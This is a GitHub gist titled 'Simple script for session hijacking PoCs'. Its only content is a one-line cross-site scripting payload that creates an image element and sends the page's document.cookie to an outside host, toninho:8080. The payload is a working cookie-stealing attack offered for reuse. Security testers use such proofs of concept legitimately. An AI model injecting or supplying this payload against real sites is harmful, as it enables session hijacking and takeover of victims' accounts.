Skip to content

Instantly share code, notes, and snippets.

@cgimenes
Created March 6, 2019 12:41
Show Gist options
  • Save cgimenes/430b6c341cd2b9b11c9c46ef721a036c to your computer and use it in GitHub Desktop.
Save cgimenes/430b6c341cd2b9b11c9c46ef721a036c to your computer and use it in GitHub Desktop.
Simple script for session hijacking PoCs
<script>document.createElement("img").src = "http://toninho:8080/?cookie="+document.cookie;</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment